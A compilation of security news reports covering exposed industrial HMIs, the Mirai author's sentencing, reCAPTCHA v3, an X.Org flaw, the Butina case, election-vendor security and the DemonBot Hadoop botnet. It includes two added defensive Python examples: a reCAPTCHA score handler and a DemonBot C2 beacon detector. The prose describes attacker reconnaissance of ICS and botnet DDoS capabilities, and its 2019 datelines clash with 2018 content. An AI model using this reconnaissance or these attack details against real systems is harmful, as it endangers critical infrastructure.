For the acid test, SecurityWeek asked Kolochenko if AI Discovery would have picked out and highlighted the Struts vulnerability exploited in the Equifax hack. Ever a stickler for accuracy and precision, Kolochenko replied, "It could have. It would not if the server concerned was disconnected from the internet at the time of the scan, or if an insider had taken other steps to hide it. Otherwise, it would have."

There are other products able to locate internet-facing security issues. What AI Discovery does is rank them in a 'fix-priority' order for CISOs. All the statistics used for this research came via HTB's free products. AI Discovery is a new paid-for product.

Internet-Exposed HMIs Put Energy, Water Facilities at Risk: Report
30.10.2019 securityweek

Malicious actors could cause serious damage to organizations in the energy and water sectors by targeting their human-machine interfaces (HMIs), according to a report released by Trend Micro on Tuesday.

The security firm’s researchers have used the Shodan search engine and other sources to find Internet-exposed industrial control systems (ICS), particularly HMIs. They showed how attackers could find the physical location of energy and water companies using public sources, and then map the locations to IP addresses through geolocation services such as Maxmind.

Experts noted that while these geolocation services are not very accurate, they do provide a list of possible IP addresses, which the attacker can validate using Shodan or port scans.

They discovered tens of devices used by oil and gas, power systems, water utility, and biogas organizations located in Europe, the United States and other parts of the world. Researchers found that in many cases the HMIs were accessible via unauthenticated VNC servers, allowing potential attackers to interact with their interface using VNC viewer applications.

The number of exposed devices was relatively small and all systems were housed by small and medium-size companies. However, researchers warn that these smaller companies can have a significant impact on the security posture of large corporations as they are often part of the supply chain.

Many of the identified HMIs included critical functionality, including for alarms, changing parameters, and starting or stopping processes. If malicious hackers gain access to these systems, they could easily cause failures or inflict significant damage.

Internet-exposed HMI

For example, one of the exposed HMIs was used by a water treatment plant. An attack on the facility via the exposed system could lead to drinking water shortages or a public health crisis caused by waterborne diseases, Trend Micro said.

Another exposed HMI belonged to an oil and gas company. An attacker with access to this device could shut down oil and gas wells, potentially causing a state-level or national shortage, the security firm warned.

Similarly damaging attacks could also be launched against solar farms, power plants, and hydroelectric facilities controlled and monitored using the HMIs identified by researchers.

In addition to hijacking the HMI and conducting various activities via its interface, experts warned that malicious actors could launch distributed denial-of-service (DDoS) attacks that cause disruptions to critical processes and result in serious material damage, exploit vulnerabilities in the HMI systems themselves, and abuse them for lateral movement within the targeted organization’s network.

Trend Micro researchers did not expect to find too many individuals interested in industrial systems on underground cybercrime forums, as these types of campaigns are typically the work of state-sponsored groups. However, they were surprised to see that there are some threat actors looking to acquire credentials for ICS/SCADA systems. Experts also found requests to disrupt the industrial systems of competitors, and opportunistic sellers trying to monetize data stolen from industrial facilities.

“While the number of exposed energy and water devices/systems that we discovered was relatively small, it is still a cause for concern because these systems should not be exposed online in the first place,” Trend Micro said in its report. “The good news is that we didn’t find exposed assets from the well-known big corporations and/or state owned entities that operate CI. The exposed assets that we found were mostly owned/operated by small companies. However attackers are not bound by the same restrictions that researchers are bound by — so this does not mean larger companies are necessarily fully secure. The bad news is that smaller companies frequently are part of the supply chain that feeds resources to big corporations; thus, a cyberattack against a small company can indirectly affect bigger corporations.”

The author of the Mirai botnet gets six months of house arrest
30.10.2019 securityaffairs

Paras Jha (22), the author of the Mirai botnet, has been sentenced to six months of house arrest and ordered to pay $8.6 million in compensation for DDoS attacks against the systems of Rutgers University.
A New Jersey court sentenced the author of the Mirai botnet, Paras Jha, 22, of Fanwood, after he pleaded guilty to violating the Computer Fraud and Abuse Act (CFAA).

The man has been sentenced to six months of house arrest and ordered to pay $8.6 million in compensation for DDoS attacks against the systems of Rutgers University.

The man was also sentenced to 2,500 hours of community service and five years of supervised release.

Jha pleaded guilty to carrying out multiple DDoS attacks against his alma mater Rutgers University between November 2014 and September 2016, before creating the Mirai botnet.

“Jha’s attacks effectively shut down Rutgers University’s central authentication server, which maintained, among other things, the gateway portal through which staff, faculty, and students delivered assignments and assessments,” reads the press release from the US Justice Department.

“At times, Jha succeeded in taking the portal offline for multiple consecutive periods, causing damage to Rutgers University, its faculty, and its students.”

In September, Jha and two accomplices admitted to being the authors of the infamous botnet and avoided jail after helping federal investigators in other cybercrime investigations.

The three men, Josiah White (21) of Washington, Pennsylvania; Paras Jha (22), of Fanwood, New Jersey, and Dalton Norman (22), of Metairie, Louisiana, pleaded guilty in December 2017 to developing and running the dreaded Mirai botnet that was involved in several massive DDoS attacks.

The identification and conviction of the three men is the result of an international joint cooperation between government agencies in the US, UK, Northern Ireland, and France, and private firms, including Palo Alto Networks, Google, Cloudflare, Coinbase, Flashpoint, Oath, Qihoo 360 and Akamai.

According to the plea agreements, White developed the Telnet scanner component used by Mirai, Jha created the botnet’s core infrastructure and the malware’s remote control features, while Norman developed new exploits.

Jha, who goes online by the moniker “Anna-senpai”, is the author of the IoT bot. He leaked the source code for the Mirai malware on a criminal forum, allowing other threat actors to use it and making attribution of the attacks harder.

According to the authorities, the three earned roughly $180,000 through their click fraud scheme.

mirai botnet

In September, the men were sentenced to five years of probation and 2,500 hours of community service. The judges also required them to repay $127,000, and they have voluntarily handed over huge amounts of cryptocurrency that the authorities seized as part of the investigation on the botnet.

Google Launches reCAPTCHA v3
30.10.2019 securityweek

Google on Monday announced the launch of reCAPTCHA v3, which aims to improve user experience by removing the need for challenges.

reCAPTCHA is the security service provided by Google for protecting websites from spam and abuse. reCAPTCHA v1 asked every user to read distorted text and enter it into a box. The second version brought significant improvements as it leverages various other types of data to determine if a request comes from a bot or a human, allowing many users to access content simply by ticking a box.

With reCAPTCHA v3, Google is making user experience even more frictionless by running adaptive risk analysis in the background and providing a score that tells website owners how suspicious an interaction is.

The score can be used to define “action” tags, which allow administrators to specify the key steps users have to take. The score ranges between 1.0, which indicates that the user is very likely human, and 0.0, which is very likely a bot.

Google recommends adding reCAPTCHA v3 to multiple pages for a more accurate risk analysis. The reCAPTCHA admin console provides information on scores and actions, and it helps users identify pages targeted by bots.

The Internet giant says the reCAPTCHA v3 score can be used for several purposes. One of them is setting a threshold that specifies if a user will be let through or if further verification is required. The default recommended threshold is 0.5.

Administrators are advised to take action behind the scenes — for example, requiring two-factor authentication to prevent credential stuffing, or sending suspicious comments on social channels for moderation — rather than blocking traffic altogether.

The score can also be combined with other data collected by website owners, including transaction histories and user profiles, for an even more accurate verification. Google says the score can also be useful for training machine learning models designed to detect abuse.
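The server-side half of what is described above, as an added example rather than Google's own code: a verification response (success, score, action, hostname, as returned by the siteverify endpoint) is mapped to allow / step-up / reject, with the 0.5 default threshold and the behind-the-scenes actions the page names. The per-action thresholds, the hostname value and the sample responses are assumptions constructed for the example.

```python
"""Server-side handling of a reCAPTCHA v3 verification result.

Added example (not Google's code). The response fields used (success,
score, action, hostname) are those of the siteverify API; the constants
and sample responses below are constructed for this example.
"""
import json
import urllib.parse
import urllib.request

SITEVERIFY_URL = "https://www.google.com/recaptcha/api/siteverify"
DEFAULT_THRESHOLD = 0.5  # the recommended default threshold

# Assumed per-action policy: more sensitive flows demand a higher score.
ACTION_THRESHOLDS = {"login": 0.7, "signup": 0.6, "comment": DEFAULT_THRESHOLD}


def verify_token(secret, token, remote_ip=None):
    """Send the client token to Google for verification; returns the parsed JSON dict."""
    data = {"secret": secret, "response": token}
    if remote_ip:
        data["remoteip"] = remote_ip
    req = urllib.request.Request(SITEVERIFY_URL, data=urllib.parse.urlencode(data).encode())
    with urllib.request.urlopen(req, timeout=5) as resp:
        return json.load(resp)


def decide(verification, expected_action, expected_hostname):
    """Map a siteverify response to a handling decision.

    "allow"   - score at or above the threshold for this action
    "step_up" - below threshold: require extra verification, never hard-block
    "reject"  - token invalid, or minted for another action/site (replay)
    """
    if not verification.get("success"):
        return "reject"
    # The action and hostname echo what the client-side execute() call used;
    # a mismatch means the token belongs to a different flow or site.
    if verification.get("action") != expected_action:
        return "reject"
    if verification.get("hostname") != expected_hostname:
        return "reject"
    score = float(verification.get("score", 0.0))
    threshold = ACTION_THRESHOLDS.get(expected_action, DEFAULT_THRESHOLD)
    return "allow" if score >= threshold else "step_up"


def handle_login(verification, hostname="example.com"):
    """Login flow: a low score triggers a second factor (credential-stuffing defence)."""
    decision = decide(verification, "login", hostname)
    return {"allow": "login", "step_up": "require_2fa", "reject": "deny"}[decision]


def handle_comment(verification, hostname="example.com"):
    """Comment flow: a low score routes the comment to moderation instead of dropping it."""
    decision = decide(verification, "comment", hostname)
    return {"allow": "publish", "step_up": "moderate", "reject": "deny"}[decision]


# Constructed sample responses (not real siteverify output).
SAMPLE_HUMAN_LOGIN = {"success": True, "score": 0.9, "action": "login", "hostname": "example.com"}
SAMPLE_BOT_LOGIN = {"success": True, "score": 0.1, "action": "login", "hostname": "example.com"}
SAMPLE_REPLAYED = {"success": True, "score": 0.9, "action": "comment", "hostname": "example.com"}
SAMPLE_INVALID = {"success": False, "error-codes": ["invalid-input-response"]}

if __name__ == "__main__":
    for name, sample in (("human login", SAMPLE_HUMAN_LOGIN), ("bot login", SAMPLE_BOT_LOGIN),
                         ("replayed token", SAMPLE_REPLAYED), ("invalid token", SAMPLE_INVALID)):
        print(f"{name}: {handle_login(sample)}")
```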

“By providing you with these new ways to customize the actions that occur for different types of traffic, this new version lets you protect your site against bots and improve your user experience based on your website’s specific needs,” said Wei Liu, product manager at Google.

X.Org Flaw Exposes Unix-Like OSes to Attacks
30.10.2019 securityweek

Several Unix-like operating systems are affected by a potentially serious X.Org vulnerability that can be exploited for privilege escalation and arbitrary code execution.

X.Org is a popular open source implementation of the X Window System (also known as X11, X or X-Windows), the graphical windowing system used by BSD and Linux operating systems.

Narendra Shinde discovered that X.Org X Server versions 1.19 and later are affected by an arbitrary file overwrite vulnerability that can be exploited by an authenticated attacker to elevate permissions and execute arbitrary code with root privileges.

The security hole, tracked as CVE-2018-14665, was introduced nearly two years ago and it affects operating systems that run X Server with elevated privileges.

“Incorrect command-line parameter validation in the Xorg X server can lead to privilege elevation and/or arbitrary files overwrite, when the X server is running with elevated privileges (ie when Xorg is installed with the setuid bit set and started by a non-root user),” X.Org developers said in an advisory.

The list of impacted operating systems includes Red Hat, CentOS, Debian, Ubuntu, and OpenBSD.

Some security experts pointed out that the vulnerability is very easy to exploit — they published a proof-of-concept (PoC) that can fit into a single tweet. While local access is normally required for exploitation, remote attackers can also — in certain circumstances — leverage the vulnerability to take control of a vulnerable system.

Code execution vulnerability found in X.Org

X.Org developers released a patch on October 25 and operating systems have also started creating fixes. There is also a workaround, but some users may not be able to apply it.

Shinde said he reported the vulnerability to Red Hat on October 10 and X.Org developers two days later. OpenBSD developers, however, were displeased with the fact that they were only notified an hour before the flaw was disclosed.

Russian Held as Agent Studied US Groups' Cyberdefenses
30.10.2019 securityweek

A year before federal prosecutors accused Maria Butina of operating as a secret agent for the Russian government, she was a graduate student at American University working on a sensitive project involving cybersecurity.

Butina's college assignment called for her to gather information on the cyberdefenses of U.S. nonprofit organizations that champion media freedom and human rights, The Associated Press has learned. It was information that could help the groups plug important vulnerabilities, but also would be of interest to the Russian government.

In fact, the Russians previously had in their sights at least two of the groups that she and other students interacted with.

Butina participated in the project under the tutelage of a respected professor who advised the State Department on cybersecurity matters. It was carried out for the nonprofit group Internews, which works extensively with the U.S. government to bolster the free flow of information in dangerous parts of the world and has drawn Russian ire with some of its programs in Russia and neighboring countries. The group also advises other nonprofits on cybersecurity.

Internews confirmed Butina's involvement and a broad description of what the project involved. A lawyer for Butina did not respond to a request for comment.

Butina's project raised few eyebrows before her July arrest, despite the fact that news reports already had posed questions about her rapid rise from selling furniture in Siberia and her ties with Kremlin officials.

As part of the project, a small group of students led by Butina was given a list of Internews partners working on human rights and press freedom issues for research purposes only, with the understanding that they not be contacted without consultation. But the students contacted some of the groups anyway, according to people involved in the project who spoke on condition of anonymity because they were not authorized to describe the work.

An individual who has worked on U.S. programs in Ukraine told the AP that after Butina's arrest he was briefed by U.S. officials who expressed concern that two Internews programs in Ukraine — dealing with media freedom and cybersecurity, and funded by the State Department — may have been exposed to Russian intelligence and may be at risk due to Butina's student work.

State Department spokesman Robert Palladino said the department was not involved with the Internews project Butina worked on.

"We have verified that all documents Internews provided to its students were publicly available, and we remain confident in the integrity of the State Department's programs with Internews," he said.

Kostiantyn Kvurt, who heads a local nonprofit that Internews helped establish, Internews Ukraine, said he was unaware of Butina's project before being informed of it by the AP, but already was wary of potential Russian intelligence interference.

"If they understand how to break our firewalls, they could find our partners," Kvurt said. "People could get detained, tortured, killed."

Internews said the students were never given access to the group's work or systems.

"The selection of the students and their roles and activities in the research was solely determined by AU faculty," spokeswoman Laura Stein Lindamood said. "Internews is currently reviewing our relationship with university-led student projects."

The access that Butina won through her coursework illustrates how academia and the extensive network of entities that often carry out sensitive, but not classified, work for the U.S. government remain national security vulnerabilities.

In this case, all the institutions expected someone else to vet Butina. Internews thought American University stood behind her; the university said it doesn't do background checks and expects the State Department to vet foreign applicants fully before issuing visas.

Prosecutors allege in court documents that attending the university was Butina's "cover" as she cultivated political contacts and ties with the National Rifle Association. They contend she was part of a clandestine political influence campaign directed by a former Russian lawmaker who has been sanctioned by the U.S. Treasury Department for his alleged ties to Russian President Vladimir Putin.

John Sipher, who once ran the CIA's Russian operations, said Butina fits the profile of the kind of lightly trained asset frequently used to help identify espionage targets without attracting attention from counterintelligence, which is often focused on high-level contacts with government officials.

"The project is perfect, because a student can do that research legitimately," Sipher said. "You can just imagine why that would be of interest. It's a sort of gold mine."

Butina's student project was led by Eric Novotny, a cybersecurity expert who has a high security clearance as an adviser to the State Department. One of Novotny's AU courses was called "Cyber Warfare, Terrorism, Espionage, and Crime." The project was aimed at helping Internews identify ways that it could help U.S.-based nonprofits improve their cybersecurity.

Novotny told the AP that even after press reports about Butina raised questions about her connections to the Russian government, he was obligated to treat her like any other student.

"I have always observed university policies and rules during my entire academic career," he said.

The university declined comment, citing federal privacy rules.

After the spring semester, Butina and three other students signed on to the work-study project, according to people familiar with the work, who spoke on condition of anonymity because they were not authorized to discuss it publicly.

One of the organizations that Butina contacted, the prominent digital rights organization Electronic Frontier Foundation, had frequent contact with Internews on cybersecurity issues before and had previously been a Russian target. But Butina did not mention Internews in a June 14, 2017, encrypted email reviewed by the AP.

In the email, addressed to cybersecurity director Eva Galperin, she wrote: "My name is Maria Butina and I'm the captain of an American University student group doing research on U.S (civil society organizations) and their cyber security challenges. We have several questions about cyber security concerns facing human rights organizations and your expertise would be very beneficial."

Novotny, who was later interviewed by the FBI about Butina, learned his instructions about not reaching out to partners had been ignored when the cybersecurity adviser of one nonprofit called him after becoming suspicious that a Russian student was asking about cyber vulnerabilities. He sternly warned the students not to ignore the protocol.

Research published by Toronto University-based The Citizen Lab analyzing Russian hacking attempts has found that civil society groups ranked behind only governments as the most frequent targets. Most often, it appeared Russian spies were trying to determine who the organizations were working with in places of strategic interest, the research found.

"Russian security services view civil society groups as a threat and treat their local partners with great suspicion." said John Scott-Railton, a cybersecurity researcher at Citizen Lab.

AP found no evidence that Butina passed any information from the university project to Moscow, but the work allowed her to contact likely Russian targets.

It's not clear why Butina's work raised concerns for the two Internews programs in Ukraine, which has not been a focus of prosecutors' case against her. But Ukraine has been a hotspot of U.S.-Russian tensions, where the two countries vie for influence.

The U.S. runs multiple programs aimed at strengthening democracy and boosting pro-Western sentiment in Russia's backyard and in parts of the world where America and Russia are vying for influence. Often they are run by contractors or nonprofit groups. By penetrating the programs, the Russians could determine who the organizations are working with and learn details about their security measures.

The Electronic Frontier Foundation often helps train at-risk civil society groups both in the U.S. and abroad. In recent years, it also has turned its attention to the scourge of state-sponsored malicious software, publishing reports on suspected government-backed hacking campaigns in Kazakhstan, Syria and Lebanon.

In 2015, the organization said Google had alerted it to a knockoff EFF site "almost certainly" operated by the infamous Russian cyberespionage ring now widely known as Fancy Bear. U.S. authorities say the hackers — who rattled the 2016 U.S. presidential campaign by releasing tens of thousands of Democrats' emails — are members of Russia's military intelligence agency.

Galperin said she had a conference call with Butina and the other students, but did not make the connection with the arrested Russian until the AP contacted her. She said the students asked general questions about the threat landscape, and that she passed along no sensitive information.

Butina later widened her search for contacts, posting a solicitation for the project on Facebook that began: "S.O.S. Poor Students Need Help from Civil Society Organizations!"

"My dear American FB friends and followers, I am looking for volunteers for a brief interview of the U.S. civil society organizations for a student research project," she wrote in July. "If you a leader of an organization registered in the United States dealing with human rights (domestically or abroad) and willing to talk online (via Skype or conference call) ... please send me a private message."

Novotny was not informed about the post.

After the student group prepared a report for Internews, Butina continued her cyberpolicy studies. Soon after she finished her spring semester this year, U.S. authorities charged her with trying to influence senior U.S. politicians and infiltrate political organizations on behalf of the Russian government.

US Election Integrity Depends on Security-Challenged Firms
30.10.2019 securityweek

It was the kind of security lapse that gives election officials nightmares. In 2017, a private contractor left data on Chicago's 1.8 million registered voters — including addresses, birth dates and partial Social Security numbers — publicly exposed for months on an Amazon cloud server.

Later, at a tense hearing, Chicago's Board of Elections dressed down the top three executives of Election Systems & Software, the nation's dominant supplier of election equipment and services.

The three shifted uneasily on folding chairs as board members grilled them about what went wrong. ES&S CEO Tom Burt apologized and repeatedly stressed that there was no evidence hackers downloaded the data.

The Chicago lapse provided a rare moment of public accountability for the closely held businesses that have come to serve as front-line guardians of U.S. election security.

A trio of companies — ES&S of Omaha, Nebraska; Dominion Voting Systems of Denver and Hart InterCivic of Austin, Texas — sell and service more than 90 percent of the machinery on which votes are cast and results tabulated. Experts say they have long skimped on security in favor of convenience, making it more difficult to detect intrusions such as occurred in Russia's 2016 election meddling.

The businesses also face no significant federal oversight and operate under a shroud of financial and operational secrecy despite their pivotal role underpinning American democracy.

In much of the nation, especially where tech expertise and budgets are thin, the companies effectively run elections either directly or through subcontractors.

"They cobble things together as well as they can," University of Connecticut election-technology expert Alexander Schwartzman said of the industry leaders. Building truly secure systems would likely make them unprofitable, he said.

The costs of inadequate security can be high. Left unmentioned at the Chicago hearing: The exposed data cache included roughly a dozen encrypted passwords for ES&S employee accounts. In a worst-case scenario, a sophisticated attacker could have used them to infiltrate company systems, said Chris Vickery of the security firm UpGuard, which discovered the data lapse.

"This is the type of stuff that leads to a complete compromise," he said. ES&S said the passwords were only used to access the company's Amazon cloud account and that "there was no unauthorized access to any data or systems at any time."

All three of the top vendors declined to discuss their finances and insist that security concerns are overblown. ES&S, for instance, said in an email that "any assertions about resistance to input on security are simply untrue" and argued that for decades the company has "been successful in protecting the voting process."


Many voting systems in use today across the more than 10,000 U.S. election jurisdictions are prone to security problems. Academic computer scientists began hacking them with ease more than a decade ago, and not much has changed.

Hackers could theoretically wreak havoc at multiple stages of the election process. They could alter or erase lists of registered voters to sow confusion, secretly introduce software to flip votes, scramble tabulation systems or knock results-reporting sites offline.

There's no evidence any of this has happened, at least not yet.

The vendors say there's no indication hackers have penetrated any of their systems. But authorities acknowledge that some election mischief or malware booby traps may have gone unnoticed.

On July 13, U.S. special counsel Robert Mueller indicted 12 Russian military intelligence operatives for, among other things, infiltrating state and local election systems. Senior U.S. intelligence officials say the Kremlin is well-positioned to rattle confidence in the integrity of elections during this year's midterms, should it choose to.

Election vendors have long resisted open-ended vulnerability testing by independent, ethical hackers — a process that aims to identify weaknesses an adversary could exploit. Such testing is now standard for the Pentagon and major banks.

While the top vendors claim to have stepped up their cybersecurity game, experts are skeptical.

"The industry continues to stonewall the problem," said Bruce McConnell, a Department of Homeland Security cybersecurity czar during the Obama administration. Election-vendor executives routinely issue assurances, he said, but don't encourage outsiders to inspect their code or offer "bug bounties" to researchers to seek out flaws in their software.

Sen. Ron Wyden, an Oregon Democrat, has long criticized what he calls the industry's "severe underinvestment in cybersecurity." At a July hearing, he accused the companies of "ducking, bobbing and weaving" on a series of basic security questions he'd asked them.

ES&S told The Associated Press that it allows independent, open-ended testing of its corporate systems as well as its products. But the company would not name the testers and declined to provide documentation of the testing or its results.

Dominion's vice president of government affairs, Kay Stimson, said her company has also had independent third parties probe its systems but would not name them or share details. Hart InterCivic, the No. 3 vendor, said it has done the same using the Canadian cybersecurity firm Bulletproof, but would not discuss the results.

ES&S hired its first chief information security officer in April. None of the big three vendors would say how many cybersecurity experts they employ. Stimson said that "employee confidentiality and security protections outweigh any potential disclosure."


Experts say they might take the industry's security assurances more seriously if not for the abundant evidence of sloppy software development, a major source of vulnerabilities.

During this year's primary elections, ES&S technology failed on several fronts.

In Los Angeles County, more than 118,000 names were left off printed voter rolls. A subsequent outside audit blamed sloppy system integration by an ES&S subsidiary during a database merge.

No such audit was done in Kansas' most populous county after a different sort of error in newly installed ES&S systems delayed the vote count by 13 hours as data uploading from thumb drives crawled.

University of Iowa computer scientist Douglas Jones said both incidents reveal mediocre programming and insufficient pre-election testing. And voting equipment vendors have never seemed security conscious "in any phase of their design," he said.

For instance, industry leader ES&S sells vote-tabulation systems equipped with cellular modems, a feature that experts say sophisticated hackers could exploit to tamper with vote counts. A few states ban such wireless connections; in Alabama, the state had to force ES&S to remove them from machines in January.

"It seemed like there was a lot more emphasis about how cool the machines could be than there was actual evidence that they were secure," said John Bennett, the Alabama secretary of state's deputy chief of staff.

California conducts some of the most rigorous scrutiny of voting systems in the U.S. and has repeatedly found chronic problems with the most popular voting systems. Last year, a state security contractor found multiple vulnerabilities in ES&S's Electionware system that could, for instance, allow an intruder to erase all recorded votes at the close of voting.

In 2014, the same contractor, Jacob Stauffer of the security firm Coherent Cyber, found "multiple critical vulnerabilities" in Dominion's Democracy Suite that could allow skilled hackers to compromise an election's outcome.

"These systems are Frankenstein's monster, essentially," Stauffer said.

The federal Department of Homeland Security began offering confidential vulnerability testing to vendors over the summer. But only one vendor has submitted to such testing, said an agency official who spoke on condition of anonymity because the official was not authorized to discuss the matter publicly.


More competition might help, but industry barriers to smaller vendors are "absolutely enormous," said Larry Moore, president of upstart Clear Ballot. Its auditable voting system took two and a half years to win federal certification at a cost of $1 million.

Startups are hard-pressed to disrupt an industry whose main players rely heavily on proprietary technologies. ES&S and other vendors have jealously guarded them in court — and also unleash lawyers against election officials who purchase competitors' products.

In October, ES&S sued Cook County, Illinois, seeking to void its $30 million, 10-year contract with a competitor. It also recently threatened Louisiana and Douglas County, Kansas, with lawsuits for choosing other suppliers.

Cook County elections director Noah Praetz said litigious behavior only chills modernization. Competition and innovation are already hampered in an industry with "really low" margins, especially considering limited government funding for election equipment.

"The market isn't functioning real well," he said.


Elections are run by the states, whose oversight of suppliers varies. California, New York and Colorado are among states that keep a close eye on the vendors, but many others have cozier relationships with them.

And the vendors can be recalcitrant. In 2017, for instance, Hart InterCivic refused to provide Virginia with a paperless e-Slate touchscreen voting machine for testing, said Edgardo Cortes, then the state election commissioner.

In this year's midterms — as in the 2016 election — roughly 1 in 5 voters will use such electronic machines. Their tallies cannot be verified because they produce no paper record.

Cortes decided to decertify all such systems. If anyone tried to break in and alter votes, he concluded, "there was really no way for us to tell if that had happened." Hart InterCivic's vice president of operations, Peter Lichtenheld, did not dispute Cortes' account in July Senate testimony, but said its Virginia customers were already moving to newer machines.

At the federal level, no authority accredits election vendors or vets them or their subcontractors. No federal law requires them to report security breaches or to perform background checks on employees or subcontractors.

Election vendors don't even have to be U.S. companies. Dominion was Canadian-owned until July, when a New York private equity firm bought a controlling interest.

Federal oversight is limited to the little-known Election Assistance Commission, a 30-employee agency that certifies voting equipment but whose recommendations are strictly voluntary. It has no oversight power and cannot sanction manufacturers for any shortcomings.

"We can't regulate," EAC chairman Thomas Hicks said during a July 11 congressional hearing when the question came up. Neither can DHS, even though it designated the nation's election systems "critical infrastructure" in early 2017.

Recently discovered DemonBot Botnet targets Hadoop servers
30.10.2019 securityaffairs

Security experts from Radware have spotted a new botnet, dubbed DemonBot, that is targeting Hadoop clusters to launch DDoS attacks against third parties.
The operators behind the DemonBot botnet exploit an unauthenticated remote command execution vulnerability in Hadoop YARN (Yet Another Resource Negotiator).

DemonBot only infects central servers; at the time of the report, experts had found over 70 active exploit servers spreading the malware and attacking systems at an aggregated rate of over 1 million exploits per day.

“DemonBot spreads only via central servers and does not expose worm-like behavior exhibited by Mirai based bots. As of today, Radware is tracking over 70 active exploit servers that are actively spreading DemonBot and are exploiting servers at an aggregated rate of over 1 Million exploits per day.” reads the analysis published by Radware.

“Note that though we did not find any evidence that DemonBot is actively targeting IoT devices at this time, Demonbot is not limited to x86 Hadoop servers and is binary compatible with most known IoT devices, following the Mirai build principles.”

Although the binary is compatible with most known Internet of Things (IoT) devices, the bot has not been observed targeting smart objects so far.

Experts investigating the botnet discovered that the malware author had actually published the source code for the bot on Pastebin at the end of September.

“Searching through pastebin archives soon revealed a unique match on a document that was pasted on Sept 29th by an actor going by the alias of Self-Rep-NeTiS. The paste contained the full source code for a botnet which the actor dubbed ‘DemonBot’.” reads the report.

“Further searches through the archives revealed the source code for the Command and Control server DemonCNC and the Python Build script for the multi-platform bots.”

The DemonBot C&C server provides two services:

a listener that allows bots to register and listen for new commands from the server;
a remote access CLI that allows admins and potential ‘customers’ to control the botnet.

When the malicious code starts, it connects over plain-text TCP to the C&C server; the IP address and port are hardcoded (default port 6982).

The malware first collects information on the system (its IP address and a port number, 22 or 23, depending on whether Python or Perl and telnetd are available on the server), then sends it to the C2.

The operators can send the bot commands to launch DDoS attacks (UDP with a random payload, TCP, UDP with a fixed payload, or an STD attack followed by TCP and then UDP floods), to open a TCP connection to a given IP and port each second until the attack ends, or to stop the attack.

The commands also take a <spoofit> argument that works as a netmask: it allows the bot’s source IP to be spoofed if the spoofit number is set to less than 32.

Further details, including IoCs, are reported in the analysis published by Radware.
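The one network characteristic the analysis gives defenders is the bot's C2 channel: plain-text TCP to a hardcoded address, port 6982 by default. The following is an added example (not Radware's code) of turning that into a detection over connection logs; the log format, the sample lines and the set of Hadoop node addresses are constructed for the demonstration.

```python
"""Spot DemonBot-style C2 beacons in connection logs (added example, not Radware's code).

The only fact taken from the analysis above is the bot's default C2 channel:
plain-text TCP to a hardcoded IP on port 6982. The log format, the sample lines
and the list of Hadoop nodes are constructed for this demonstration.
"""
import ipaddress
from collections import defaultdict

DEMONBOT_DEFAULT_C2_PORT = 6982

# Constructed sample lines: "timestamp src_ip:src_port -> dst_ip:dst_port proto"
SAMPLE_CONN_LOG = """\
2018-10-25T10:00:01Z 10.0.1.15:41022 -> 203.0.113.7:6982 tcp
2018-10-25T10:00:02Z 10.0.1.15:41023 -> 10.0.1.20:8088 tcp
2018-10-25T10:00:05Z 10.0.1.16:53011 -> 203.0.113.7:6982 tcp
2018-10-25T10:00:06Z 10.0.1.30:55000 -> 198.51.100.9:443 tcp
2018-10-25T10:00:07Z 10.0.1.15:41024 -> 203.0.113.7:6982 udp
"""

# Constructed: addresses of the YARN/Hadoop nodes we care about (assumption)
HADOOP_NODES = {"10.0.1.15", "10.0.1.16", "10.0.1.17"}

# Private ranges are listed explicitly rather than using ip_address().is_private,
# which also treats the documentation ranges used in the sample as private.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def parse_line(line):
    """Split one constructed log line into a record with integer ports."""
    ts, src, _arrow, dst, proto = line.split()
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {"ts": ts, "src_ip": src_ip, "src_port": int(src_port),
            "dst_ip": dst_ip, "dst_port": int(dst_port), "proto": proto.lower()}


def find_c2_beacons(log_text, hadoop_nodes=HADOOP_NODES, c2_port=DEMONBOT_DEFAULT_C2_PORT):
    """Return {suspected_c2_ip: [cluster nodes that connected to it]}.

    A hit is a TCP flow from a Hadoop node to a non-RFC1918 address on the C2 port.
    Several cluster nodes converging on one external host:port is the signal to act on;
    a single flow on an unusual port is worth a look but is weaker evidence.
    """
    hits = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec["proto"] != "tcp" or rec["dst_port"] != c2_port:
            continue
        if rec["src_ip"] not in hadoop_nodes or is_rfc1918(rec["dst_ip"]):
            continue
        hits[rec["dst_ip"]].add(rec["src_ip"])
    return {ip: sorted(nodes) for ip, nodes in hits.items()}


if __name__ == "__main__":
    for c2, nodes in find_c2_beacons(SAMPLE_CONN_LOG).items():
        print(f"suspected DemonBot C2 {c2}:{DEMONBOT_DEFAULT_C2_PORT} contacted by {', '.join(nodes)}")
```

The port is only a default, so this catches the stock build; a real deployment would pair it with the fact that Hadoop data nodes rarely initiate outbound TCP to arbitrary Internet hosts at all.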

‘DemonBot' Botnet Targets Hadoop Servers
29.10.2019 securityweek

A newly discovered botnet is targeting Hadoop clusters in an attempt to leverage their computing power to launch distributed denial of service (DDoS) attacks.

The operation, Radware security researchers have discovered, targets an unauthenticated remote command execution in Hadoop YARN (Yet Another Resource Negotiator). A proof-of-concept exploit for the flaw was first published in March this year.

Dubbed DemonBot, the malware doesn’t employ worm-like capabilities, meaning that it only infects central servers. At the moment, there are over 70 active exploit servers spreading the threat and targeting systems at an aggregated rate of over 1 million exploits per day, Radware says.

The malware’s binary, the security researchers discovered, is compatible with most known Internet of Things (IoT) devices, but the bot was not seen targeting IoT until now.

During their investigation, the Radware researchers discovered that the malware author had actually published the source code for the botnet on pastebin at the end of September. The code for the command and control (C&C) server and the Python build script for the multi-platform bots were also discovered.

The C&C server provides two services, one that allows bots to register and listen for new commands from the server, and a remote access CLI so that admins and potential ‘customers’ can control the botnet. Credentials for remote users are stored in a plain text file.

Upon execution, the DemonBot malware connects to the C&C server (hardcoded with IP and port) and starts listening to commands. By default, it uses port 6982, while the connection is plain text TCP.

The threat sends to the server information on the infected system, including the public IP address, port number (22 or 23, depending on the availability of Python or Perl and telnetd on the server), information on the availability of a Python or Perl interpreter on the device server, the architecture of the server, and operating system.

The operator can send the bot commands to launch DDoS attacks such as UDP with a random payload, TCP, UDP with a fixed payload, or the sequential execution of STD attack, followed by TCP, followed by UDP. The bot can also be instructed to make a TCP connection to a specified IP and port each second until the attack is over, or to completely stop the attack.

“If multiple IPs are passed in the argument in a comma-separated list, an individual attack process is forked for each IP,” Radware said.

